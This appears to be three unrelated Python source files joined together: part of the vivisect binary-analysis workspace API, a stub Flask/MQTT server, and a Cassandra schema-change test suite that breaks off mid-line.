_getStrTinfo(self, va, size, subs): ploc = self.getLocation(va, range=False) if ploc: # the string we're making is a substring of some outer one # still make this string location, but let the parent know about us too and our # children as well. Ultimately, the outermost parent should be responsible for # knowing about all it's substrings modified = False pva, psize, ptype, pinfo = ploc if (va, size) not in pinfo: modified = True pinfo.append((va, size)) for sva, ssize in subs: if (sva, ssize) not in pinfo: modified = True pinfo.append((sva, ssize)) if modified: tinfo = pinfo else: tinfo = subs return tinfo def makeString(self, va, size=None): """ Create a new string location at the given VA. You may optionally specify size. If size==None, the string will be parsed as a NULL terminated ASCII string. Substrings are also handled here. 
Generally, the idea is: * if the memory range is completey undefined, we just create a new string at the VA specified (provided that asciiStringSize return a size greater than 0 or the parameter size is greater than 0) * if we create a string A at virtual address 0x40 with size 20, and then later a string B at virtual address 0x44, we won't actually make a new location for the string B, but rather add info to the tinfo portion of the location tuple for string A, and when trying to retrieve string B via getLocation, we'll make up a (sort of) fake location tuple for string B, provided that range=True is passed to getLocation * if we create string A at virtual address 0x40, and then later a string B at virtual 0x30 that has a size of 16 or more, we overwrite the string A with the location information for string B, and demote string A to being a tuple of (VA, size) inside of string B's location information. This method only captures suffixes, but perhaps in the future we'll have symbolik resolution that can capture true substrings that aren't merely suffixes. This same formula is applied to unicode detection as well """ if size is None: size = self.asciiStringSize(va) if size <= 0: raise Exception("Invalid String Size: %d" % size) # rip through the desired memory range to populate any substrings subs = self._getSubstrings(va, size, LOC_STRING) tinfo = self._getStrTinfo(va, size, subs) if self.getName(va) is None: m = self.readMemory(va, size-1).replace("\n", "") self.makeName(va, "str_%s_%.8x" % (m[:16],va)) return self.addLocation(va, size, LOC_STRING, tinfo=tinfo) def makeUnicode(self, va, size=None): if size is None: size = self.uniStringSize(va) if size <= 0: raise Exception("Invalid Unicode Size: %d" % size) subs = self._getSubstrings(va, size, LOC_UNI) tinfo = self._getStrTinfo(va, size, subs) if self.getName(va) is None: m = self.readMemory(va, size-1).replace("\n","").replace("\0","") self.makeName(va, "wstr_%s_%.8x" % (m[:16],va)) return self.addLocation(va, size, LOC_UNI, tinfo=tinfo) def addConstModule(self, modname): ''' Add constants declared within the named module to the constants resolver namespace. Example: vw.addConstModule('vstruct.constants.ntstatus') ''' mod = self.loadModule(modname) self.vsconsts.addModule(mod) def addStructureModule(self, namespace, modname): ''' Add a vstruct structure module to the workspace with the given namespace. Example: vw.addStructureModule('ntdll', 'vstruct.defs.windows.win_5_1_i386.ntdll') This allows subsequent struct lookups by names like ''' mod = self.loadModule(modname) self.vsbuilder.addVStructNamespace(namespace, mod) def getStructure(self, va, vstructname): """ Parse and return a vstruct object for the given name. This (like parseOpcode) does *not* require that the location be a struct and will not create one (use makeStructure). """ s = vstruct.getStructure(vstructname) if s is None: s = self.vsbuilder.buildVStruct(vstructname) if s is not None: bytes = self.readMemory(va, len(s)) s.vsParse(bytes) return s def makeStructure(self, va, vstructname, vs=None): """ Make a location which is a structure and will be parsed/accessed by vstruct. You must specify the vstruct name for the structure you wish to have at the location. Returns a vstruct from the location. """ if vs is None: vs = self.getStructure(va, vstructname) self.addLocation(va, len(vs), LOC_STRUCT, vstructname) # Determine if there are any pointers we need make # xrefs for... 
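        # Walk the struct's primitives in declaration order, keeping a running
        # byte offset so each pointer-width field that holds a valid VA gets a
        # REF_PTR xref from its exact address inside the structure.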
offset = 0 for p in vs.vsGetPrims(): if isinstance(p, vs_prims.v_ptr): vptr = p.vsGetValue() if self.isValidPointer(vptr): self.addXref(va+offset, vptr, REF_PTR) offset += len(p) return vs def getUserStructNames(self): ''' Retrive the list of the existing user-defined structure names. Example: for name in vw.getUserStructNames(): print('Structure Name: %s' % name) ''' return self.vsbuilder.getVStructCtorNames() def getUserStructSource(self, sname): ''' Get the source code (as a string) for the given user defined structure. Example: ssrc = vw.getUserStructSource('MyStructureThing') ''' return self.getMeta('ustruct:%s' % sname) def setUserStructSource(self, ssrc): ''' Save the input string as a C structure definition for the workspace. User-defined structures may then be applied to locations, or further edited in the future. Example: src = "struct woot { int x; int y; };" vw.setUserStructSource( src ) ''' # First, we make sure it compiles... ctor = vs_cparse.ctorFromCSource( ssrc ) # Then, build one to get the name from it... vs = ctor() cname = vs.vsGetTypeName() self.setMeta('ustruct:%s' % cname, ssrc) return cname def asciiStringSize(self, va): """ Return the size (in bytes) of the ascii string at the specified location (or -1 if no terminator is found in the memory map) """ offset, bytez = self.getByteDef(va) foff = bytez.find('\x00', offset) if foff == -1: return foff return (foff - offset) + 1 def uniStringSize(self, va): """ Return the size (in bytes) of the unicode string at the specified location (or -1 if no terminator is found in the memory map) """ offset, bytez = self.getByteDef(va) foff = bytez.find('\x00\x00', offset) if foff == -1: return foff return (foff - offset) + 2 def addLocation(self, va, size, ltype, tinfo=None): """ Add a location tuple. """ ltup = (va, size, ltype, tinfo) #loc = self.locmap.getMapLookup(va) #if loc is not None: #raise Exception('Duplicate Location: (is: %r wants: %r)' % (loc,ltup)) self._fireEvent(VWE_ADDLOCATION, ltup) return ltup def getLocations(self, ltype=None, linfo=None): """ Return a list of location objects from the workspace of a particular type. """ if ltype is None: return list(self.loclist) if linfo is None: return [ loc for loc in self.loclist if loc[2] == ltype ] return [ loc for loc in self.loclist if (loc[2] == ltype and loc[3] == linfo) ] def isLocation(self, va, range=False): """ Return True if the va represents a location already. """ if self.getLocation(va, range=range) is not None: return True return False def isLocType(self, va, ltype): """ You may use this to test if a given VA represents a location of the specified type. example: if vw.isLocType(0x41414141, LOC_STRING): print("string at: 0x41414141") """ tup = self.getLocation(va) if tup is None: return False return tup[L_LTYPE] == ltype def getLocation(self, va, range=True): """ Return the va,size,ltype,tinfo tuple for the given location. (specify range=True to potentially match a va that is inside a location rather than the beginning of one, this behavior only affects strings/substring retrieval currently) """ loc = self.locmap.getMapLookup(va) if not loc: return loc if range and loc[L_LTYPE] in (LOC_STRING, LOC_UNI): # dig into any sublocations that may have been created, trying to find the best match # possible, where "best" means the substring that both contains the va, and has no substrings # that contain the va. 
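            # subs is sorted by start va below, so each containing substring
            # overwrites ltup in turn and the innermost (last) match wins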
if not loc[L_TINFO]: return loc subs = sorted(loc[L_TINFO], key=lambda k: k[0], reverse=False) ltup = loc for sva, ssize in subs: if sva <= va < sva + ssize: ltup = (sva, ssize, loc[L_LTYPE], []) return ltup else: return loc def getLocationRange(self, va, size): """ A "location range" is a list of location tuples where undefined space *will* be represented by LOC_UNDEF tuples to provide a complete accounting of linear workspace. """ ret = [] endva = va+size undefva = None while va < endva: ltup = self.getLocation(va) if ltup is None: if undefva is None: undefva = va va += 1 else: if undefva is not None: ret.append((undefva, va-undefva, LOC_UNDEF, None)) undefva = None ret.append(ltup) va += ltup[L_SIZE] # Mop up any hanging udefs if undefva is not None: ret.append((undefva, va-undefva, LOC_UNDEF, None)) return ret def delLocation(self, va): """ Delete the given Location object from the binary (removes any xrefs/etc for the location as well) This will raise InvalidLocation if the va is not an exact match for the beginning of a location. """ loc = self.getLocation(va) if loc is None: raise InvalidLocation(va) # remove xrefs from this location for xref in self.getXrefsFrom(va): self.delXref(xref) self._fireEvent(VWE_DELLOCATION, loc) def getRenderInfo(self, va, size): """ Get nearly everything needed to render a workspace area to a display. This function *greatly* speeds up interface code and is considered "tightly coupled" with the asmview code. (and is therefore subject to change). """ locs = [] funcs = {} names = {} comments = {} extras = {} for loc in self.getLocationRange(va, size): lva, lsize, ltype, tinfo = loc locs.append(loc) name = self.getName(lva) isfunc = self.isFunction(lva) cmnt = self.getComment(lva) if name is not None: names[lva] = name if isfunc == True: funcs[lva] = True if cmnt is not None: comments[lva] = cmnt if ltype == LOC_UNDEF: # Expand out all undefs so we can send all the info endva = lva + lsize while lva < endva: uname = self.getName(lva) ucmnt = self.getComment(lva) if uname is not None: names[lva] = uname if ucmnt is not None: comments[lva] = ucmnt #ret.append(((lva, 1, LOC_UNDEF, None), self.getName(lva), False, self.getComment(lva))) lva += 1 elif ltype == LOC_OP: extras[lva] = self.parseOpcode(lva) elif ltype == LOC_STRUCT: extras[lva] = self.getStructure(lva, tinfo) return locs, funcs, names, comments, extras def getPrevLocation(self, va, adjacent=True): """ Get the previous location behind this one. If adjacent is true, only return a location which is IMMEDIATELY behind the given va, otherwise search backward for a location until you find one or hit the edge of the segment. """ va -= 1 ret = self.locmap.getMapLookup(va) if ret is not None: return ret if adjacent: return None va -= 1 while va > 0: ret = self.locmap.getMapLookup(va) if ret is not None: return ret va -= 1 return None def vaByName(self, name): return self.va_by_name.get(name, None) def getLocationByName(self, name): """ Return a location object by the name of the location. """ va = self.vaByName(name) if va is None: raise InvalidLocation(0, "Unknown Name: %s" % name) return self.getLocation(va) def getNames(self): """ Return a list of tuples containing (va, name) """ return self.name_by_va.items() def getName(self, va, smart=False): ''' Returns the name of the specified virtual address (or None). Smart mode digs beyond simple name lookups, as follows: If va falls within a known function in the workspace, we return "funcname+<delta>". 
If not, and the va falls within a mapped binary, we return "filename+<delta>" ''' name = self.name_by_va.get(va) if name is not None or not smart: return name # TODO: by previous symbol? # by function baseva = self.getFunction(va) basename = self.name_by_va.get(baseva, None) if self.isFunction(va): basename = 'sub_0%x' % va # by filename if basename is None: basename = self.getFileByVa(va) if basename is None: return None baseva = self.getFileMeta(basename, 'imagebase') delta = va - baseva if delta: pom = ('', '+')[delta>0] name = "%s%s%s" % (basename, pom, hex(delta)) else: name = basename return name def makeName(self, va, name, filelocal=False, makeuniq=False): """ Set a readable name for the given location by va. There *must* be a Location defined for the VA before you may name it. You may set a location's name to None to remove a name. makeuniq allows Vivisect to append some number to make the name unique. This behavior allows for colliding names (eg. different versions of a function) to coexist in the same workspace. default behavior is to fail on duplicate (False). """ if filelocal: segtup = self.getSegment(va) if segtup is None: self.vprint("Failed to find file for 0x%.8x (%s) (and filelocal == True!)" % (va, name)) if segtup is not None: fname = segtup[SEG_FNAME] if fname is not None: name = "%s.%s" % (fname, name) oldva = self.vaByName(name) # If that's already the name, ignore the event if oldva == va: return if oldva is not None: if not makeuniq: raise DuplicateName(oldva, va, name) else: logger.debug('makeName: %r already lives at 0x%x', name, oldva) # tack a number on the end index = 0 newname = "%s_%d" % (name, index) newoldva = self.vaByName(newname) while self.vaByName(newname) not in (None, newname): # if we run into the va we're naming, that's the name still if newoldva == va: return newname logger.debug('makeName: %r already lives at 0x%x', newname, newoldva) index += 1 newname = "%s_%d" % (name, index) newoldva = self.vaByName(newname) name = newname self._fireEvent(VWE_SETNAME, (va,name)) return name def saveWorkspace(self, fullsave=True): if self.server is not None: return modname = self.getMeta("StorageModule") filename = self.getMeta("StorageName") if modname is None: raise Exception("StorageModule not specified!") if filename is None: raise Exception("StorageName not specified!") # Usually this is "vivisect.storage.basicfile mod = self.loadModule(modname) # If they specified a full save, *or* this event list # has never been saved before, do a full save. if fullsave: mod.saveWorkspace(self, filename) else: mod.saveWorkspaceChanges(self, filename) self._createSaveMark() def loadFromFd(self, fd, fmtname=None, baseaddr=None): """ Read the first bytes of the file descriptor and see if we can identify the type. If so, load up the parser for that file type, otherwise raise an exception. 
Returns file md5 """ mod = None fd.seek(0) if fmtname is None: bytes = fd.read(32) fmtname = viv_parsers.guessFormat(bytes) mod = viv_parsers.getParserModule(fmtname) if hasattr(mod, "config"): self.mergeConfig(mod.config) fd.seek(0) filename = hashlib.md5( fd.read() ).hexdigest() fname = mod.parseFd(self, fd, filename, baseaddr=baseaddr) self.initMeta("StorageName", filename+".viv") # Snapin our analysis modules self._snapInAnalysisModules() return fname def _saveSymbolCaches(self): if not self.config.vdb.SymbolCacheActive: return pathstr = self.config.vdb.SymbolCachePath symcache = e_symcache.SymbolCachePath(pathstr) symsbyfile = collections.defaultdict(list) # Get the image base addresses imgbases = {} for fname in self.getFiles(): imgbases[ fname ] = self.getFileMeta(fname,'imagebase') for va,name in self.name_by_va.items(): mmap = self.getMemoryMap(va) if mmap is None: continue symva = va - imgbases.get(mmap[3], va) if symva: symtype = e_resolv.SYMSTOR_SYM_SYMBOL if self.isFunction(va): symtype = e_resolv.SYMSTOR_SYM_FUNCTION symsbyfile[mmap[3]].append((symva, 0, name, symtype)) for filenorm, symtups in symsbyfile.items(): symhash = self.getFileMeta(filenorm, 'SymbolCacheHash') if symhash is None: continue self.vprint('Saving Symbol Cache: %s (%d syms)' % (symhash,len(symtups))) symcache.setCacheSyms( symhash, symtups ) def loadFromFile(self, filename, fmtname=None, baseaddr=None): """ Read the first bytes of the file and see if we can identify the type. If so, load up the parser for that file type, otherwise raise an exception. ( if it's a workspace, trigger loadWorkspace() as a convenience ) Returns the basename the file was given on load. """ mod = None if fmtname is None: fmtname = viv_parsers.guessFormatFilename(filename) if fmtname in ('viv', 'mpviv'): self.loadWorkspace(filename) return self.normFileName(filename) mod = viv_parsers.getParserModule(fmtname) fname = mod.parseFile(self, filename, baseaddr=baseaddr) self.initMeta("StorageName", filename+".viv") # Snapin our analysis modules self._snapInAnalysisModules() return fname def loadFromMemory(self, memobj, baseaddr, fmtname=None): """ Load a memory map (or potentially a mapped binary file) from the memory object's map at baseaddr. """ mod = None if fmtname is None: bytez = memobj.readMemory(baseaddr, 32) fmtname = viv_parsers.guessFormat(bytez) # TODO: Load workspace from memory? mod = viv_parsers.getParserModule(fmtname) mod.parseMemory(self, memobj, baseaddr) mapva, mapsize, mapperm, mapfname = memobj.getMemoryMap(baseaddr) if not mapfname: mapfname = 'mem_map_%.8x' % mapva self.initMeta('StorageName', mapfname+".viv") # Snapin our analysis modules self._snapInAnalysisModules() def getFiles(self): """ Return the current list of file objects in this workspace. """ return self.filemeta.keys() def normFileName(self, filename): normname = os.path.basename(filename).lower() # Strip off an extension if normname.find('.') != -1: parts = normname.split('.') normname = '_'.join(parts[:-1]) ok = string.letters + string.digits + '_' chars = list(normname) for i in range(len(chars)): if chars[i] not in ok: chars[i] = '_' normname = ''.join(chars) #if normname[0].isdigit(): #normname = '_' + normname return normname def addFile(self, filename, imagebase, md5sum): """ Create and add a new vivisect File object for the specified information. This will return the file object which you may then use to do things like add imports/exports/segments etc... 
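
        Example (values are illustrative):
            fname = vw.addFile('/path/woot.exe', 0x8048000, md5sum)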
""" nname = self.normFileName(filename) if nname in self.filemeta: raise Exception("Duplicate File Name: %s" % nname) self._fireEvent(VWE_ADDFILE, (nname, imagebase, md5sum)) return nname def addEntryPoint(self, va): ''' Add an entry point to the definition for the given file. This will hint the analysis system to create functions when analysis is run. NOTE: No analysis is triggered by this function. ''' self.setVaSetRow('EntryPoints', (va,)) def getEntryPoints(self): ''' Get all the parsed entry points for all the files loaded into the workspace. Example: for va in vw.getEntryPoints(): ''' return [ x for x, in self.getVaSetRows('EntryPoints') ] def setFileMeta(self, fname, key, value): """ Store a piece of file specific metadata (python primatives are best for values) """ if fname not in self.filemeta: raise Exception("Invalid File: %s" % fname) self._fireEvent(VWE_SETFILEMETA, (fname, key, value)) def getFileMeta(self, filename, key, default=None): """ Retrieve a piece of file specific metadata """ d = self.filemeta.get(filename) if d is None: raise Exception("Invalid File: %s" % filename) return d.get(key, default) def getFileMetaDict(self, filename): ''' Retrieve the file metadata for this file as a key:val dict. ''' d = self.filemeta.get(filename) if d is None: raise Exception('Invalid File: %s' % filename) return d def getFileByVa(self, va): segtup = self.getSegment(va) if segtup is None: return None return segtup[SEG_FNAME] def getLocationDistribution(self): # NOTE: if this changes, don't forget the report module! totsize = 0 for mapva, mapsize, mperm, mname in self.getMemoryMaps(): totsize += mapsize loctot = 0 ret = {} for i in range(LOC_MAX): cnt = 0 size = 0 for lva,lsize,ltype,tinfo in self.getLocations(i): cnt += 1 size += lsize loctot += size tname = loc_type_names.get(i, 'Unknown') ret[i] = (tname, cnt, size, int((size/float(totsize))*100)) # Update the undefined based on totals... undeftot = totsize-loctot ret[LOC_UNDEF] = ('Undefined', 0, undeftot, int((undeftot/float(totsize)) * 100)) return ret ################################################################# # # VA Set API # def getVaSetNames(self): """ Get a list of the names of the current VA lists. """ return self.vasets.keys() def getVaSetDef(self, name): """ Get the list of (name, type) pairs which make up the rows for this given VA set (the first one *always* the VA, but you can name it as you like...) """ x = self.vasetdefs.get(name) if x is None: raise InvalidVaSet(name) return x def getVaSetRows(self, name): """ Get a list of the rows in this VA set. """ x = self.vasets.get(name) if x is None: raise InvalidVaSet(name) return x.values() def getVaSet(self, name): """ Get the dictionary of va:<rowdata> entries. """ x = self.vasets.get(name) if x is None: raise InvalidVaSet(name) return x def addVaSet(self, name, defs, rows=()): """ Add a va set: name - The name for this VA set defs - List of (<name>,<type>) tuples for the rows (va is always first) rows - An initial set of rows for values in this set. """ self._fireEvent(VWE_ADDVASET, (name, defs, rows)) def delVaSet(self, name): """ Delete a VA set by name. """ if name not in self.vasets: raise Exception("Unknown VA Set: %s" % name) self._fireEvent(VWE_DELVASET, name) def setVaSetRow(self, name, rowtup): """ Use this API to update the row data for a particular entry in the VA set. """ self._fireEvent(VWE_SETVASETROW, (name, rowtup)) def getVaSetRow(self, name, va): ''' Retrieve the va set row for va in the va set named name. 
Example: row = vw.getVaSetRow('WootFunctions', fva) ''' vaset = self.vasets.get( name ) if vaset is None: return None return vaset.get( va ) def delVaSetRow(self, name, va): """ Use this API to delete the rowdata associated with the specified VA from the set. """ if name not in self.vasets: raise Exception("Unknown VA Set: %s" % name) self._fireEvent(VWE_DELVASETROW, (name, va)) ################################################################# # # Shared Workspace APIs # def chat(self, msg): uname = e_config.getusername() # FIXME this should be part of a UI event model. self._fireEvent(VWE_CHAT, (uname, msg)) def iAmLeader(self, winname): ''' Announce that your workspace is leading a window with the specified name. This allows others to opt-in to following the nav events for the given window name. Example: vw.iAmLeader('WindowTitle') ''' if not self.server: raise Exception('iAmLeader() requires being connected to a server.') user = e_config.getusername() self.server._fireEvent(VTE_MASK | VTE_IAMLEADER, (user,winname)) def followTheLeader(self, winname, expr): ''' Announce a new memory expression to navigate to if if a given window is following the specified user/winname Example: vw.followTheLeader('FunExample', 'sub_08042323') ''' if not self.server: raise Exception('followTheLeader() requires being connected to a server.') user = e_config.getusername() self.server._fireEvent(VTE_MASK | VTE_FOLLOWME, (user,winname, expr)) ################################################################# # # Color Map API # def getColorMaps(self): """ Return a list of the names of the given color maps """ return self.colormaps.keys() def addColorMap(self, mapname, colormap): """ Add a colormap dictionary with the given name for the map. (A colormap dictionary is va:color entries) """ self._fireEvent(VWE_ADDCOLOR, (mapname, colormap)) def delColorMap(self, mapname): self._fireEvent(VWE_DELCOLOR, mapname) def getColorMap(self, mapname): """ Return the colormap dictionary for the given map name. """ return self.colormaps.get(mapname) def _getNameParts(self, name, va): ''' Return the given name in three parts: fpart: filename, if applicable (for file-local names) npart: base name vapart: address, if tacked on the end If any of these are not applicable, they will return None for that field. ''' fpart = None npart = name vapart = None fname = self.getFileByVa(va) vastr = '_%.8x' % va if name.startswith(fname + '.'): fpart, npart = name.split('.', 1) elif name.startswith('*.'): skip, npart = name.split('.', 1) if npart.endswith(vastr) and not npart == 'sub' + vastr: npart, vapart = npart.rsplit('_', 1) return fpart, npart, vapart def _addNamePrefix(self, name, va, prefix, joinstr=''): ''' Add a prefix to the given name paying attention to the filename prefix, and any VA suffix which may exist. This is used by multiple analysis modules. Uses _getNameParts. ''' fpart, npart, vapart = self._getNameParts(name, va) if fpart is None and vapart is None: name = joinstr.join([prefix, npart]) elif vapart is None: name = fpart + '.' + joinstr.join([prefix, npart]) elif fpart is None: name = joinstr.join([prefix, npart]) else: name = fpart + '.' + joinstr.join([prefix, npart]) + '_%s' % vapart return name ########################################################## # # The envi.symstore.resolver.SymbolResolver API... # def getSymByName(self, name): # Check for a sym va = self.vaByName(name) if va is not None: return e_resolv.Symbol(name, va, 0) # check for the need for a deref. 
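        # If the name matches a loaded file, return a FileSymbol wrapper so
        # "filename.symbol" style lookups can recurse via its getSymByName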
d = self.filemeta.get(name) if d is not None: return VivFileSymbol(self, name, d.get("imagebase"), 0, self.psize) def getSymByAddr(self, addr, exact=True): name = self.getName(addr) if name is None: if self.isValidPointer(addr): name = "loc_%.8x" % addr if name is not None: #FIXME fname #FIXME functions/segments/etc... return e_resolv.Symbol(name, addr, 0) def setSymHint(self, va, idx, hint): ''' Set a symbol hint which will be used in place of operand values during disassembly among other things... You may also set hint=None to delete sym hints. ''' self._fireEvent(VWE_SYMHINT, (va, idx, hint)) def getSymHint(self, va, idx): h = self.getFref(va, idx) if h is not None: f = self.getFunction(va) loctup = self.getFunctionLocal(f, h) if loctup: return loctup[1] return self.symhints.get((va, idx), None) class VivFileSymbol(e_resolv.FileSymbol): # A namespace tracker thingie... def __init__(self, vw, fname, base, size, width=4): self.vw = vw e_resolv.FileSymbol.__init__(self, fname, base, size, width) def getSymByName(self, name): return self.vw.getSymByName("%s.%s" % (self.name, name)) def getVivPath(*pathents): dname = os.path.dirname(__file__) dname = os.path.abspath(dname) return os.path.join(dname, *pathents)
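

# A minimal usage sketch for the workspace API above (the path and binary are
# hypothetical; assumes the vivisect package exporting VivWorkspace):
#
#     import vivisect
#     vw = vivisect.VivWorkspace()
#     vw.loadFromFile('/path/woot.exe')
#     vw.analyze()
#     for fva in vw.getFunctions():
#         print('0x%.8x: %s' % (fva, vw.getName(fva)))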
app.py
from flask import Flask
from flask import request, abort
# from flask import render_template
import helpers.mqtt as mqtt
import helpers.secret_parser as secret
import helpers.logging as logging
import db.db_helper as db
from threading import Thread
from time import sleep
# import sys
import json
# --end imports

# --variables
app = Flask(__name__)
logger = logging.Logger()
database = db.Database()
# --end variables

# --Flask routing------------------------------------------------
# LOGIN
@app.route('/login', methods=['GET', 'POST'])
def login():
    data = request.get_json(silent=True)
    if data is None:
        abort(400)
    username = data.get('username')
    if username is None:
        abort(400)
    # NOTE: credential checking is not implemented yet; echo the username
    # back so the route returns a valid response instead of None
    return json.dumps({'username': username}), 200

# USER
@app.route('/user', methods=['GET'])
def userGet():
    return 'forbidden', 403

@app.route('/user', methods=['POST'])
def userPost():
    return 'forbidden', 403

@app.route('/user', methods=['PUT'])
def userPut():
    return 'forbidden', 403

@app.route('/user', methods=['DELETE'])
def userDelete():
    return 'forbidden', 403
# end USER

# DEVICE
@app.route('/device', methods=['GET'])
def deviceGet():
    return 'forbidden', 403

@app.route('/device', methods=['POST'])
def devicePost():
    return 'forbidden', 403

@app.route('/device', methods=['PUT'])
def devicePut():
    return 'forbidden', 403

@app.route('/device', methods=['DELETE'])
def deviceDelete():
    return 'forbidden', 403
# end DEVICE

# GROUP
@app.route('/group', methods=['GET'])
def groupGet():
    return 'forbidden', 403

@app.route('/group', methods=['POST'])
def groupPost():
    return 'forbidden', 403

@app.route('/group', methods=['PUT'])
def groupPut():
    return 'forbidden', 403

@app.route('/group', methods=['DELETE'])
def groupDelete():
    return 'forbidden', 403
# end GROUP
# ---------------------------------------------------------------

# --MQTT message handling
def runMessageHandler():
    logger.logMQTTMsg("thread started")
    while True:
        sleep(1)
        v = mqtt.getMessage()
        if v == -1:
            continue
        # print("[MQTT]--Handling message: topic \"" + v["topic"] + "\", payload \"" + v["payload"] + "\"")
        logger.logMQTTMsg("received message: topic \"" + v["topic"] + "\", payload \"" + v["payload"] + "\"")
# ------

# --Separate thread functions
def runFlask():
    logger.logFlask("thread started")
    flaskSecret = secret.retrieve('flask')
    app.run(host=flaskSecret["host"], port=flaskSecret["port"])

def runMqtt():
    logger.logMQTT("thread started")
    mqttSecret = secret.retrieve('mqtt')
    mqtt.init(mqttSecret["host"], mqttSecret["port"], mqttSecret["username"], mqttSecret["password"])
    mqtt.client.loop_forever()
# ------

# --Main functions
def main():
    print(database.show_db())
    mqttThread = Thread(target=runMqtt)
    mqttThread.start()
    msgHandlerThread = Thread(target=runMessageHandler)
    msgHandlerThread.start()
    logger.logInfo("finished main()")
    runFlask()

if __name__ == "__main__":
    main()
# ------
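
# For reference, a sketch of the secret layout runFlask()/runMqtt() expect
# from secret.retrieve() (key names are taken from the calls above; storing
# them as JSON is an assumption -- the real schema lives in
# helpers/secret_parser.py):
#
#     {
#         "flask": {"host": "0.0.0.0", "port": 5000},
#         "mqtt": {"host": "localhost", "port": 1883,
#                  "username": "user", "password": "pass"}
#     }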
concurrent_schema_changes_test.py
import time, os, pprint, glob, re from threading import Thread from dtest import debug, Tester from ccmlib.node import Node def wait(delay=2): """ An abstraction so that the sleep delays can easily be modified. """ time.sleep(delay) class TestConcurrentSchemaChanges(Tester): def __init__(self, *argv, **kwargs): super(TestConcurrentSchemaChanges, self).__init__(*argv, **kwargs) self.allow_log_errors = True def prepare_for_changes(self, session, namespace='ns1'): """ prepares for schema changes by creating a keyspace and column family. """ debug("prepare_for_changes() " + str(namespace)) # create a keyspace that will be used self.create_ks(session, "ks_%s" % namespace, 2) session.execute('USE ks_%s' % namespace) # create a column family with an index and a row of data query = """ CREATE TABLE cf_%s ( col1 text PRIMARY KEY, col2 text, col3 text ); """ % namespace session.execute(query) wait(1) session.execute("INSERT INTO cf_%s (col1, col2, col3) VALUES ('a', 'b', 'c');" % namespace) # create an index session.execute("CREATE INDEX index_%s ON cf_%s(col2)"%(namespace, namespace)) # create a column family that can be deleted later. query = """ CREATE TABLE cf2_%s ( col1 uuid PRIMARY KEY, col2 text, col3 text ); """ % namespace session.execute(query) # make a keyspace that can be deleted self.create_ks(session, "ks2_%s" % namespace, 2) def make_schema_changes(self, session, namespace='ns1'): """ makes a heap of changes. create keyspace drop keyspace create column family drop column family update column family drop index create index (modify column family and add a key) rebuild index (via jmx) set default_validation_class """ debug("make_schema_changes() " + str(namespace)) session.execute('USE ks_%s' % namespace) # drop keyspace session.execute('DROP KEYSPACE ks2_%s' % namespace) wait(2) # create keyspace self.create_ks(session, "ks3_%s" % namespace, 2) session.execute('USE ks_%s' % namespace) wait(2) # drop column family session.execute("DROP COLUMNFAMILY cf2_%s" % namespace) # create column family query = """ CREATE TABLE cf3_%s ( col1 uuid PRIMARY KEY, col2 text, col3 text, col4 text ); """ % (namespace) session.execute(query) # alter column family query = """ ALTER COLUMNFAMILY cf_%s ADD col4 text; """ % namespace session.execute(query) # add index session.execute("CREATE INDEX index2_%s ON cf_%s(col3)"%(namespace, namespace)) # remove an index session.execute("DROP INDEX index_%s" % namespace) def validate_schema_consistent(self, node): """ Makes sure that there is only one schema """ debug("validate_schema_consistent() " + node.name) response = node.nodetool('describecluster', True)[0] schemas = response.split('Schema versions:')[1].strip() num_schemas = len(re.findall('\[.*?\]', schemas)) assert num_schemas == 1, "There were multiple schema versions: " + pprint.pformat(schemas) def basic_test(self): """ make several schema changes on the same node. 
""" debug("basic_test()") cluster = self.cluster cluster.populate(2).start() node1 = cluster.nodelist()[0] wait(2) session = self.cql_connection(node1) self.prepare_for_changes(session, namespace='ns1') self.make_schema_changes(session, namespace='ns1') def changes_to_different_nodes_test(self): debug("changes_to_different_nodes_test()") cluster = self.cluster cluster.populate(2).start() [node1, node2] = cluster.nodelist() wait(2) cursor = self.cql_connection(node1) self.prepare_for_changes(cursor, namespace='ns1') self.make_schema_changes(cursor, namespace='ns1') wait(3) self.validate_schema_consistent(node1) # wait for changes to get to the first node wait(20) cursor = self.cql_connection(node2) self.prepare_for_changes(cursor, namespace='ns2') self.make_schema_changes(cursor, namespace='ns2') wait(3) self.validate_schema_consistent(node1) # check both, just because we can self.validate_schema_consistent(node2) def changes_while_node_down_test(self): """ makes schema changes while a node is down. Make schema changes to node 1 while node 2 is down. Then bring up 2 and make sure it gets the changes. """ debug("changes_while_node_down_test()") cluster = self.cluster cluster.populate(2).start() [node1, node2] = cluster.nodelist() wait(2) cursor = self.patient_cql_connection(node2) self.prepare_for_changes(cursor, namespace='ns2') node1.stop() wait(2) self.make_schema_changes(cursor, namespace='ns2') wait(2) node2.stop() wait(2) node1.start() node2.start() wait(20) self.validate_schema_consistent(node1) def changes_while_node_toggle_test(self): """ makes schema changes while a node is down. Bring down 1 and change 2. Bring down 2, bring up 1, and finally bring up 2. 1 should get the changes. """ debug("changes_while_node_toggle_test()") cluster = self.cluster cluster.populate(2).start() [node1, node2] = cluster.nodelist() wait(2) cursor = self.patient_cql_connection(node2) self.prepare_for_changes(cursor, namespace='ns2') node1.stop() wait(2) self.make_schema_changes(cursor, namespace='ns2') wait(2) node2.stop() wait(2) node1.start() node2.start() wait(20) self.validate_schema_consistent(node1) def decommission_node_test(self): debug("decommission_node_test()") cluster = self.cluster cluster.populate(1) # create and add a new node, I must not be a seed, otherwise # we get schema disagreement issues for awhile after decommissioning it. 
node2 = Node('node2', cluster, True, ('127.0.0.2', 9160), ('127.0.0.2', 7000), '7200', '0', None) cluster.add(node2, False) [node1, node2] = cluster.nodelist() node1.start() node2.start() wait(2) cursor = self.patient_cql_connection(node1) self.prepare_for_changes(cursor) node2.decommission() wait(30) self.validate_schema_consistent(node1) self.make_schema_changes(cursor, namespace='ns1') # create and add a new node node3 = Node('node3', cluster, True, ('127.0.0.3', 9160), ('127.0.0.3', 7000), '7300', '0', None) cluster.add(node3, True) node3.start() wait(30) self.validate_schema_consistent(node1) def snapshot_test(self): debug("snapshot_test()") cluster = self.cluster cluster.populate(2).start() [node1, node2] = cluster.nodelist() wait(2) cursor = self.cql_connection(node1) self.prepare_for_changes(cursor, namespace='ns2') wait(2) cluster.flush() wait(2) node1.nodetool('snapshot -t testsnapshot') node2.nodetool('snapshot -t testsnapshot') wait(2) self.make_schema_changes(cursor, namespace='ns2') wait(2) cluster.stop() ### restore the snapshots ## # clear the commitlogs and data dirs = ( '%s/commitlogs' % node1.get_path(), '%s/commitlogs' % node2.get_path(), '%s/data/ks_ns2/cf_*/*' % node1.get_path(), '%s/data/ks_ns2/cf_*/*' % node2.get_path(), ) for dirr in dirs: for f in glob.glob(os.path.join(dirr)): if os.path.isfile(f): os.unlink(f) # copy the snapshot. TODO: This could be replaced with the creation of hard links. os.system('cp -p 